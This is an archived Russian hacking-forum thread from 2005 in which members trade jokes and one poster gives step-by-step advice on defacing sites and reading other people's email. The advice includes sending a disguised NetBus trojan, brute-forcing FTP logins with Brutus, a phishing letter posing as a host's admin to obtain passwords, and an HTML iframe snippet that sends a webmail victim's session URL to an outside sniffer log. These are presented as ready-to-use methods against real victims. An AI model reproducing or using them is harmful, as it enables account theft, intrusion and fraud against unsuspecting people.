Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Личный ТОП (все вопросы по хаку, тупые вопросы сюда)

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Журнал Xakep] >> Личный ТОП (все вопросы по хаку, тупые вопросы сюда)
Имя
Сообщение << Старые топики   Новые топики >>
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 16:06:43   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
——————————–
Этот топ посвящаю всем тем кто хочет стать хакерами или просто чему-нибудь научиться!!!
$$$все тупые вопросы сюда$$$
***помощь новичкам***
Post #: 1
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 16:28:53   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
Здравствуйте уважаемые хакеры.
Вчера я захотел что-нибудь взломать и набрал www.microsoft.com. Через несколько минут у меня уже был веб-шелл на одном из подузлов этого сайта, через него я залил backdoor и сделал создал telnet-бэкконнект к одному из своих малайзийских прокси-сетей. Но дело не в этом.
Когда я подключился к 22 порту (через secure shell), я увидел, что передо мной многосегментная сеть рабочих станций, объединенных маршрутизаторами, причем с настолько криво настроенным wingate (даже я это заметил), что при отправке некоторых пакетов через default gateway потеря маршрутов в сегменты другой подсети составляет более 30%!! Как понимаете, об активном сниффинге речи и быть не может!!! Ну да я опять не об этом… В общем, там еще стоял IDS - последний Snort, кажется - мне пришлось его убить запустить локальный демон-эмулятор (самописный, т.к. в сети не нашел), создав копии процесса на всех маршрутизаторах. Но я опять отвлекся… Так вот, главный вопрос к вам у меня такой - помогите, пожалуйста, задефейсить хоть какую-нибудь страничку!!!!!! Ну пожалуйста, а то я уже не знаю, что мне делать. Я ведь тоже хочу стать хакером [sm=em62.gif][sm=em62.gif][sm=em62.gif][sm=em62.gif][sm=em62.gif]
Post #: 2
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 16:30:33   
Python

Сообщений: 4964
Оценки: 0
Присоединился: 2005-12-14 08:32:13
Не нам судить, z0o/m/, кто хакер, а кто нет… [sm=6.gif]
Post #: 3
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:05:09   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
[sm=9.gif]То что ты хочешь стать хакером это конечно хорошо……..
По твоему хоть и не совсем дурацому вопросу могу ответить так:
1. Первый способ дефейса сайта - это послать админу сервера трояна. Я не буду писать, где можно взять трояна. Их в наше время туча. Просто набери в поисковике " Хакерские программы " и он тебе тучу сайтов выдаст. Посылаешь ты троян (я предпочитаю NetBus или Back Office , но для новичков советую НетБас (файл patch.exe посылать)), потом, если этот админ его запустит (в этом-то и состоит всё заподло этого случая. Ща очень распространены трояны и незнамо от кого и незнамо какие файлы умные админы не запускают, а проверяют антивирусами. Поэтому надо твой файл как-нибудь прикрыть (заархивируй например) Но это уже не моё дело..)то соединяешься по АйПи к своей жертве, лазиешь по диску и скачиваешь пассы от нужного тебе сайта. :)

2 . Второй способ - способ подбора. Для этого случая тебе нужна прога Брутфорс или Брутус. (Брутус можно скачать на hacksoft.ru . Там ваще много нормальных программ лежит) Берёшь этот самый Брутус, настраиваешь его на нужный тебе сайт, ставишь протокол ФТП и идёшь за пивом. Этот способ плох тем, что приходится долго ждать. Если ты зметил, то с помощью Брутуса можно похачить и ПОП3(почту) и ещё много других вещей. :)

3 . Третий способ - использование дырок в скриптах cgi . Ты, конечно, можешь скачать cgi сканеры, которые сейчас плодятся в безобразном количестве, но я советую тебе другое! На том же сайте hacksoft.ru есть он-лайн тулзы. Одна из них - CGI scanner . Просканировав нужный тебе сайт, там же ты сможешь узнать как какую дырку использовать. :)

4 . Четвёртый способ - человеческий фактор. Надо послать письмо жертве от Админа сервера, содержание которого будет примерно такое: " Здравствуйте. Сервер, на котором находится Ваш сайт подлежит профилактике ошибок в cgi скриптах. И нам необходим ваш логин и пароль . С уважением, Администрация ", после чего, используя анонимный е-мейл, отослать его. Конечно, ты можешь придумать и другую "историю", которая будет лучше моей. Всё зависит от твоей фантазии. Этот способ очень хорош и с помощью часто делают дефейсы.

Насчёт того, что не мне судить, так я и не сужу, просто стараюсь помочь!!! [sm=sm128.gif]
Post #: 4
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:11:19   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
[sm=11.gif] гыы ну и конечно читай моя "подпись" [sm=001.gif]
Желаю удачи в хакерском ремесле!!! [sm=em88.gif]
Post #: 5
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:29:45   
-ddd-

Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
Для етого ра3Дел есть. Слепой епть.
Post #: 6
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:30:37   
AdReNaL1Ne

Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
quote:

—————-<BR>Цитата: Дата:16.12.2005 16:28:53, Автор:Lex_Voodoo ::
Здравствуйте уважаемые хакеры.<BR>Вчера я захотел что-нибудь взломать и набрал www.microsoft.com. Через несколько минут у меня уже был веб-шелл на одном из подузлов этого сайта, через него я залил backdoor и сделал создал telnet-бэкконнект к одному из своих малайзийских прокси-сетей. Но дело не в этом.<BR>Когда я подключился к 22 порту (через secure shell), я увидел, что передо мной многосегментная сеть рабочих станций, объединенных маршрутизаторами, причем с настолько криво настроенным wingate (даже я это заметил), что при отправке некоторых пакетов через default gateway потеря маршрутов в сегменты другой подсети составляет более 30%!! Как понимаете, об активном сниффинге речи и быть не может!!! Ну да я опять не об этом… В общем, там еще стоял IDS - последний Snort, кажется - мне пришлось его убить запустить локальный демон-эмулятор (самописный, т.к. в сети не нашел), создав копии процесса на всех маршрутизаторах. Но я опять отвлекся… Так вот, главный вопрос к вам у меня такой - помогите, пожалуйста, задефейсить хоть какую-нибудь страничку!!!!!! Ну пожалуйста, а то я уже не знаю, что мне делать. Я ведь тоже хочу стать хакером [sm=em62.gif][sm=em62.gif][sm=em62.gif][sm=em62.gif][sm=em62.gif]
—————-



ЖжОшь))) А что, он в самом деле поверил? :=)))
Post #: 7
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:30:55   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
какой?
Post #: 8
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:35:03   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
Что ж поделать!!! Я предоставил всего лишь краткую информацию….какие люди только не бывают! [sm=14.gif]
Post #: 9
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 17:44:06   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
quote:

—————-<BR>Цитата: Дата:16.12.2005 17:05:09, Автор:z0o/m/ ::
[sm=9.gif]То что ты хочешь стать хакером это конечно хорошо……..<BR><BR>По твоему хоть и не совсем дурацому вопросу могу ответить так:<BR><BR>1. Первый способ дефейса сайта - это послать админу сервера трояна. Я не буду писать, где можно взять трояна. Их в наше время туча. Просто набери в поисковике &amp;amp;quot; Хакерские программы &amp;amp;quot; и он тебе тучу сайтов выдаст. Посылаешь ты троян (я предпочитаю NetBus или Back Office , но для новичков советую НетБас (файл patch.exe посылать)), потом, если этот админ его запустит (в этом-то и состоит всё заподло этого случая. Ща очень распространены трояны и незнамо от кого и незнамо какие файлы умные админы не запускают, а проверяют антивирусами. Поэтому надо твой файл как-нибудь прикрыть (заархивируй например) Но это уже не моё дело..)то соединяешься по АйПи к своей жертве, лазиешь по диску и скачиваешь пассы от нужного тебе сайта. :) <BR><BR><BR>2 . Второй способ - способ подбора. Для этого случая тебе нужна прога Брутфорс или Брутус. (Брутус можно скачать на hacksoft.ru . Там ваще много нормальных программ лежит) Берёшь этот самый Брутус, настраиваешь его на нужный тебе сайт, ставишь протокол ФТП и идёшь за пивом. &amp;amp;#1069;тот способ плох тем, что приходится долго ждать. Если ты зметил, то с помощью Брутуса можно похачить и ПОП3(почту) и ещё много других вещей. :) <BR><BR><BR>3 . Третий способ - использование дырок в скриптах cgi . Ты, конечно, можешь скачать cgi сканеры, которые сейчас плодятся в безобразном количестве, но я советую тебе другое! На том же сайте hacksoft.ru есть он-лайн тулзы. Одна из них - CGI scanner . Просканировав нужный тебе сайт, там же ты сможешь узнать как какую дырку использовать. :) <BR><BR><BR>4 . Четвёртый способ - человеческий фактор. Надо послать письмо жертве от Админа сервера, содержание которого будет примерно такое: &amp;amp;quot; Здравствуйте. Сервер, на котором находится Ваш сайт подлежит профилактике ошибок в cgi скриптах. И нам необходим ваш логин и пароль . С уважением, Администрация &amp;amp;quot;, после чего, используя анонимный е-мейл, отослать его. Конечно, ты можешь придумать и другую &amp;amp;quot;историю&amp;amp;quot;, которая будет лучше моей. Всё зависит от твоей фантазии. &amp;amp;#1069;тот способ очень хорош и с помощью часто делают дефейсы. <BR><BR><BR>Насчёт того, что не мне судить, так я и не сужу, просто стараюсь помочь!!! [sm=sm128.gif]
—————-



Здравствуйте еще раз уважаемые хакеры!
z0o/m/, спасибо за такой подробный ответ [sm=em62.gif] Столько много способов, мне даже стало тебя немного жаль, как ты все это описывал. Не стоит тратить столько сил на ламеров вроде меня, в следующий раз можно просто дать адрес странички, где бы я все это прочитал (адрес можно вставить в панели управления отправкой сообщения, вот так: satangroup.metastock.ru/texts/hack/deface.htm) Кстати, статью я помню, но с 2001 года она, к сожалению, немного устарела [sm=15.gif] Эх, кульный чел CyberDeatH… Ну да ладно, ато опять отвлекусь…

Вот по твоему ответу у меня есть пара непАнятных моментов, которые сейчас попробую написать:
1. По первому способу можно было задефейсить в далеком 2001 году - когда админами были все, кому не лень, а о том, что трояны, спамы, куки и прочие врелоносные программы знали немногие, сейчас уже, к сожалению, не так =( К тому же, не совсем понятно, что такое patch.exe и где его брать. Лучше ли он, чем lomalka_saitov.exe?

2."Брутфорс или Брутус" программа очень хорошая, но, к сожалению, механизмы клиент-серверной идентификации не стоят на месте, и там, где 4 года назад работал метод brutte-forse, теперь везде "too many failed logins; disconnected" [sm=15.gif][sm=15.gif][sm=15.gif]

3. Способ cgi хороший, но я пока не совсем выучил этот язык программирования. Кстати, с момента 2001 года hacksoft.ru давно переехал на http://www.securitylab.ru/tools/, которого теперь уже тоже нету [sm=15.gif]

4. А вот этот способ мне очень понравился!! Огромное спасибо [sm=em62.gif][sm=em62.gif] Теперь я почти все понял и уже иду дефейсить Главные Сайты Страны!
Надеюсь, теперь у меня получится хоть что-нибудб задефейсить. И я стану НАСТОЯЩИМ хакером [sm=em121.gif]
Post #: 10
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 19:51:53   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
Слушай lex хватит прикалываться……..я смотрю ты не совсем на новичка похож и тем более на ламера, так что хватить меня своими глупыми вопросами засыпать!!!
P.S. ты что ж думал я буду тебе всё это вручную писать?!
Конечно я пользовался статьёй из нета……методы может и устаревшие, но иногда мож. и прокатят!!!
Так что завязуй с этим……….[sm=sm203.gif]
Post #: 11
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:05:54   
][eaL

Сообщений: 417
Оценки: 0
Присоединился: 2004-03-28 15:47:07
Ыыыыыыыыыыыыыыыы, Лекс, это пять!=)))) Жжешь:). z0o/m/ тож жжот, тока тем, что он поверил=)).
Post #: 12
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:24:40   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
quote:

—————-<BR>Цитата: Дата:16.12.2005 22:05:54, Автор:][eaL ::
Ыыыыыыыыыыыыыыыы, Лекс, это пять!=)))) Жжешь:). z0o/m/ тож жжот, тока тем, что он поверил=)).
—————-


Да я не поверил, просто решил ответить и всё :) он ведь просил любой странички а не маЙкросоФта!!! [sm=16.gif]
Post #: 13
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:26:26   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
————————————————————
ОТВЕЧА&#1070; НА ВОПРОС:
Необходимо создать ящик на www.rambler.ru
После чего послать сообщение жертве, вставив в него следующий код со снифером:
<ifгаmе src="http://www.antichat.ru/cgi-bin/s.jpg" width="330" height="76" style="overflow:hidden;
bаскgrоund-color:black;border:none;"ifгаmеborder="0"</ifгаmе>
где http://www.antichat.ru/cgi-bin/s.jpg является снифером antichat.ru
Когда код вставлен и адрес жертвы указан, отметим галочкой (в функциях ел-почты на rambler.ru
посылку html кода) и посылаем сообщение!!!
Как только жертва откроет письмо (ваше) сниффер сработает и выдаст URL (необходимый вам)
Посмотреть URL вы сможете на сайте antichat.ru\log sniff там вы обнаружите топ с e-mail вашей жертвы
и URL…
Скопируйте URL и вставьте в броузер, после чего вы окажетесь на страничке с вашим письмом,
находящимся в принятых сообщениях жертвы!!!
После чего выходим в "принятые сообщения" и смотрим всё что нужно!!!
————————————————————
Post #: 14
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:30:02   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
сори………..
Post #: 15
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:30:21   
BMX

Сообщений: 5
Оценки: 0
Присоединился: 2005-12-16 21:15:04
Помоги взломать мылО?!
Post #: 16
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:33:52   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
я кажется уже написал тебе как читать письма!!! [sm=ban.gif]
Post #: 17
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:37:49   
BMX

Сообщений: 5
Оценки: 0
Присоединился: 2005-12-16 21:15:04
как?!я не понял!!!
Post #: 18
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:41:56   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
Раз не понял иди в школу учись!!! Я же просто и доходчиво обЪяснил!
Post #: 19
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:43:23   
chip075

Сообщений: 609
Оценки: 0
Присоединился: 2005-01-28 09:38:59
Плагиат + флуд = [sm=ban.gif][sm=7.gif] мог просто линк кинуть[sm=mad.gif][sm=mad.gif][sm=mad.gif]
Post #: 20
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 22:47:33   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
[sm=9.gif]…………….ладно не кепятись
Post #: 21
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 23:16:30   
BMX

Сообщений: 5
Оценки: 0
Присоединился: 2005-12-16 21:15:04
http://www.antichat.ru/cgi-bin/s.jpg что то сюда не заходит!
Post #: 22
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 23:22:49   
BMX

Сообщений: 5
Оценки: 0
Присоединился: 2005-12-16 21:15:04
http://www.antichat.ru/cgi-bin/s.jpg не заходит сюда!
Post #: 23
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-16 23:23:58   
BMX

Сообщений: 5
Оценки: 0
Присоединился: 2005-12-16 21:15:04
http://www.antichat.ru/cgi-bin/s.jpg не заходит сюда!
Post #: 24
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 00:07:11   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
как понять не заходит?
Post #: 25
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 01:45:52   
sysfuck3r

Сообщений: 355
Оценки: 0
Присоединился: 2005-03-22 19:39:54
Лекс, вай ар вей стилл нот баннед ?
Post #: 26
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 04:22:32   
-ddd-

Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
http://www.porno-xxx.com/ - заходи сюда
Post #: 27
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 11:31:52   
zona-xxx

Сообщений: 1185
Оценки: 0
Присоединился: 2005-02-25 23:10:52
quote:

—————-<BR>Цитата: Дата:17.12.2005 4:22:32, Автор:-ddd- ::
http://www.porno-xxx.com/ - заходи сюда
—————-


Да…Это совсем в тему…Заходи.[sm=9.gif]
Post #: 28
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 12:01:53   
][eaL

Сообщений: 417
Оценки: 0
Присоединился: 2004-03-28 15:47:07
quote:

—————-<BR>Цитата: Дата:17.12.2005 11:31:52, Автор:zona-xxx ::
quote:

—————-<BR><BR>Цитата: Дата:17.12.2005 4:22:32, Автор:-ddd- ::
http://www.porno-xxx.com/ - заходи сюда
—————-

<BR><BR>Да…&amp;amp;#1069;то совсем в тему…Заходи.[sm=9.gif]
—————-


Ага, заходи и забивай на всех девушек с ихними мылами=)
Post #: 29
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-17 14:52:11   
AdReNaL1Ne

Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
quote:

—————-<BR>Цитата: Дата:16.12.2005 23:23:58, Автор:BMX ::
http://www.antichat.ru/cgi-bin/s.jpg не заходит сюда!
—————-



ГыЫы))) Какой доверчивый [sm=9.gif]
Post #: 30
Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2005-12-18 22:19:24   
z0o/m/

Сообщений: 49
Оценки: 0
Присоединился: 2005-12-03 23:26:35
[sm=7.gif] Ты что тупой!? Я ж доходчиво всё написал!!!
Зачем тебе туда заходить?!
Для особо умных поясняю где находится лог снифа:
http://antichat.ru/sniff/log.php
Въехал?
Код посылаешь на мыло, потом идёшь по этой ссылке и там смотришь URL\заходишь по нему и ты уже в "принятых сообщениях" жертвы!!!
[sm=mad.gif]Неужели всё так трудно?
Post #: 31
RE: Личный ТОП (все вопросы по хаку, тупые вопросы сюда) - 2007-10-03 10:43:05.230000   
Убийца портов

Сообщений: 2
Оценки: 0
Присоединился: 2007-10-03 10:12:40.153333
слухай привет не поможеш открыть досту в Krav nete к диспетчеру задач. на всех компах..[X(][sm=sm128.gif]
Post #: 32
Страниц:  [1]
Все форумы >> [Журнал Xakep] >> Личный ТОП (все вопросы по хаку, тупые вопросы сюда)







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.